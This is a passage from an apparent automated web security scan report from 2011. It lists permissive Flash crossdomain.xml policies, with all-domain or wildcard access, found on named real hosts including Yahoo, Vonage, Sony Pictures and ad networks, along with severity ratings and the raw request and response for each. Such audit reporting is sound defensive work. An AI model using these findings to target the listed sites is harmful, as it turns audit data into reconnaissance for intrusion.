Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www2.whitefence.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:02:31 GMT
Server: Apache
Vary: *
Cache-Control: max-age=86400
Expires: Wed, 07 Sep 2011 12:02:31 GMT
Last-Modified: Thu, 25 Sep 2008 22:17:43 GMT
ETag: "c888d-c9-48dc0e07"
Accept-Ranges: bytes
Content-Length: 201
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

3.63. http://yql.yahooapis.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yql.yahooapis.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: yql.yahooapis.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Date: Tue, 06 Sep 2011 12:45:06 GMT
Server: YTS/1.19.8
Age: 0

<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-domain-policy>

3.64. http://a.adready.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://a.adready.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: a.adready.com

Response

HTTP/1.0 200 OK
Status: 200 OK
Last-Modified: Thu, 27 Jan 2011 18:42:13 GMT
Content-Type: application/xml
Date: Tue, 06 Sep 2011 12:45:38 GMT
Content-Length: 367
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="maste
...[SNIP]...
<allow-access-from domain="*.adready.com" />
<allow-access-from domain="adready.com" />
<allow-access-from domain="*.local" />
...[SNIP]...

3.65. http://ads.bridgetrack.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ads.bridgetrack.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.bridgetrack.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 541
Content-Type: text/html
Date: Tue, 06 Sep 2011 11:58:42 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="ads.bridgetrack.com.edgesuite.net" />
   <allow-access-from domain="ads.bri
...[SNIP]...
<allow-access-from domain="sec-ads.bridgetrack.com" />
   <allow-access-from domain="cms-ads.bridgetrack.com" />
   <allow-access-from domain="sec-cms-ads.bridgetrack.com" />
<allow-access-from domain="*.spongecell.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.myvolvo.com.au" secure="false" />
...[SNIP]...

3.66. http://espanol.vonage.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://espanol.vonage.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: espanol.vonage.com

Response

HTTP/1.1 200 OK
Content-Length: 538
Content-Type: text/xml
Last-Modified: Tue, 01 Jun 2010 15:31:08 GMT
Accept-Ranges: bytes
ETag: "9bd62f759f1cb1:3746"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 11:50:15 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="convertlanguage.com"/>
<allow-access-from domain="*.convertlanguage.com"/>
<allow-access-from domain="espanol.support.vonage.com"/>
...[SNIP]...
<allow-access-from domain="*.vonage.com"/>
...[SNIP]...
<allow-access-from domain="speedtest.vonage.com"/>
...[SNIP]...
<allow-access-from domain="support.vonage.com"/>
...[SNIP]...

3.67. http://finance.yahoo.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://finance.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: finance.yahoo.com

Response

HTTP/1.0 200 OK
Date: Tue, 06 Sep 2011 12:44:55 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Thu, 05 Jun 2008 01:38:47 GMT
Accept-Ranges: bytes
Content-Length: 161
Vary: Accept-Encoding
Content-Type: application/xml
Age: 0
Server: YTS/1.20.7

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" />
<allow-access-from domain="us.js2.yimg.com" />
</cross-domain-policy>

3.68. http://frontier.my.yahoo.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://frontier.my.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: frontier.my.yahoo.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:29:48 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Mon, 21 Aug 2006 16:30:13 GMT
Accept-Ranges: bytes
Content-Length: 228
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" secure="false" />
...[SNIP]...

3.69. http://geo.yahoo.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://geo.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: geo.yahoo.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:29:52 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Mon, 21 Aug 2006 16:30:13 GMT
Accept-Ranges: bytes
Content-Length: 228
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" secure="false" />
...[SNIP]...

3.70. http://gws.maps.yahoo.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://gws.maps.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: gws.maps.yahoo.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:49:52 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
X-Yahoo-Serving-Host: gws26.maps.sp1.yahoo.com
Last-Modified: Sat, 05 Dec 2009 08:01:33 GMT
Accept-Ranges: bytes
Content-Length: 469
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master
...[SNIP]...
<allow-access-from domain="*.yimg.com" />
   <allow-access-from domain="*.maps.yahoo.com" />
   <allow-access-from domain="*.corp.yahoo.com" />
   <allow-access-from domain="*.ds.corp.yahoo.com" />
   <allow-access-from domain="*.yahoo.com" />
...[SNIP]...

3.71. http://maps.yahoo.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://maps.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: maps.yahoo.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:44:56 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Fri, 04 Aug 2006 08:27:42 GMT
Accept-Ranges: bytes
Content-Length: 228
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" secure="false" />
...[SNIP]...

3.72. http://media.sonypictures.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://media.sonypictures.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: media.sonypictures.com

Response

HTTP/1.0 200 OK
Server: Apache
Accept-Ranges: bytes
Content-Type: application/xml
Age: 204157
Date: Tue, 06 Sep 2011 12:45:10 GMT
Last-Modified: Mon, 09 May 2011 23:28:45 GMT
Content-Length: 965
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="*.sonypictures.com"/>
<allow-access-from domain="*.avatarlabs.com"/>
<allow-access-from domain="*.client-projects.com"/>
<allow-access-from domain="*.eyewonderlabs.com"/>
<allow-access-from domain="*.eyewonder.com"/>
<allow-access-from domain="*.pointroll.com"/>
<allow-access-from domain="*.doubleclick.com"/>
<allow-access-from domain="*.doubleclick.net"/>
<allow-access-from domain="*.2mdn.net"/>
<allow-access-from domain="*.dartmotif.net"/>
<allow-access-from domain="*.gstatic.com"/>
<allow-access-from domain="*.wovencube.org"/>
<allow-access-from domain="*.wovencube.biz"/>
<allow-access-from domain="*.wovencube.com"/>
...[SNIP]...

3.73. http://mi.adinterax.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://mi.adinterax.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: mi.adinterax.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=7776000
Date: Tue, 06 Sep 2011 12:44:47 GMT
Content-Length: 708
Content-Type: application/xml
Expires: Wed, 02 Nov 2011 09:39:00 GMT
Last-Modified: Thu, 02 Sep 2010 20:10:03 GMT
Accept-Ranges: bytes
Server: Footprint Distributor V4.6
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.adinterax.com" />
<allow-access-from domain="adinterax.cnet.com.edgesuite.net" />
<allow-access-from domain="adinterax.myspace.com" />
<allow-access-from domain="*.yahoo.com" />
<allow-access-from domain="stage.mce.media.yahoo.com" secure="false" />
...[SNIP]...
<allow-access-from domain="mce.media.yahoo.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.broadcast.com" />
<allow-access-from domain="*.launch.com" />
<allow-access-from domain="*.hotjobs.com" />
<allow-access-from domain="*.yimg.com" />
<allow-access-from domain="*.yahooligans.com" />
<allow-access-from domain="*.overture.com" />
...[SNIP]...

3.74. http://movies.yahoo.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://movies.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: movies.yahoo.com

Response

HTTP/1.0 200 OK
Date: Tue, 06 Sep 2011 12:44:58 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Fri, 04 Aug 2006 08:27:42 GMT
Accept-Ranges: bytes
Content-Length: 228
Content-Type: application/xml
Age: 0
Server: YTS/1.20.5

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" secure="false" />
...[SNIP]...

3.75. http://music.yahoo.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://music.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: music.yahoo.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Length: 265
Content-Type: text/xml
Last-Modified: Fri, 12 May 2006 20:13:33 GMT
Accept-Ranges: bytes
ETag: "30a7778b076c61:16afec"
Server: Microsoft-IIS/6.0
Date: Tue, 06 Sep 2011 12:45:06 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" />
<allow-access-from domain="*.yimg.com" />
...[SNIP]...

3.76. http://new.music.yahoo.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://new.music.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: new.music.yahoo.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:09 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Mon, 22 Aug 2011 13:09:31 GMT
Accept-Ranges: bytes
Content-Length: 287
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="l.yimg.com" secure="false"/>
...[SNIP]...

3.77. http://omg.yahoo.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://omg.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: omg.yahoo.com

Response

HTTP/1.0 200 OK
Date: Tue, 06 Sep 2011 12:45:20 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Mon, 28 Mar 2011 09:57:27 GMT
Accept-Ranges: bytes
Content-Length: 259
Content-Type: application/xml
Age: 0
Server: YTS/1.20.5

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" />
<allow-access-from domain="*.yimg.com" />
...[SNIP]...

3.78. http://optimized-by.rubiconproject.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: optimized-by.rubiconproject.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:53 GMT
Server: RAS/1.3 (Unix)
Last-Modified: Fri, 17 Sep 2010 22:21:19 GMT
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Accept-Ranges: bytes
Content-Length: 223
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.rubiconproject.com" />

...[SNIP]...

3.79. http://pagead2.googlesyndication.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pagead2.googlesyndication.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Fri, 27 May 2011 17:28:41 GMT
Date: Mon, 05 Sep 2011 23:23:50 GMT
Expires: Tue, 06 Sep 2011 23:23:50 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 47163
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

3.80. http://realestate.yahoo.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://realestate.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: realestate.yahoo.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:10 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Mon, 21 Aug 2006 16:30:13 GMT
Accept-Ranges: bytes
Content-Length: 228
Connection: close
Content-Type: application/x-httpd-php

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" secure="false" />
...[SNIP]...

3.81. http://scottrade.wsod.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://scottrade.wsod.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: scottrade.wsod.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 12:48:47 GMT
Content-Type: text/xml
Connection: close
Last-Modified: Tue, 16 Feb 2010 21:38:42 GMT
ETag: "9d595a-20a-47fbe8ebb5c80"
Accept-Ranges: bytes
Content-Length: 522
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-http-request-headers-from domain="*" headers="
...[SNIP]...
<allow-access-from domain="*.wsod.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.wallst.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.wsodqa.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msads.net" secure="false" />
...[SNIP]...

3.82. http://search.yahoo.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://search.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: search.yahoo.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:46:48 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Thu, 29 Oct 2009 00:28:40 GMT
Accept-Ranges: bytes
Content-Length: 228
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" secure="false" />
...[SNIP]...

3.83. http://shopping.yahoo.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://shopping.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

